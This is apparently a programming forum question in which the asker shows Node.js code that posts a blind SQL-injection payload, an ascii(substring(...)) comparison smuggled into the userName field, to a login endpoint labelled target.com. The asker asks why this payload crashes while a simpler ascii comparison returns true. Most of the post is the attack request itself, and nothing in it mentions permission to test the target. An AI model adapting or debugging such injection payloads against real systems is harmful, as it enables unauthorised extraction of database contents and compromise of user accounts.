# Can't perform substring function inside blind SQL-injection

Tags: node.js, sql-injection

My request is

```
    var request = require('request');
    request.post({
        headers: {'content-type' : 'application/x-www-form-urlencoded'},
        url:     'https://www.target.com/account/IsValidLogin',
        form:   { 
            userName: "example@example.org' AND ascii(substring('baaa',1,1))>2  AND 'x'='x", 
            password: "123456"
            }
        }, function(error, response, body){
            console.log(body);
        }
    );
```

and it crashes. Seems like target DB doesn't support `substring` function. However, maybe I wrote something wrong. As I know `substring` is pretty common function.

If I put this `example@example.org' AND ascii('b')>2  AND 'x'='x` then it returns `true`.

Target DB type is unknown.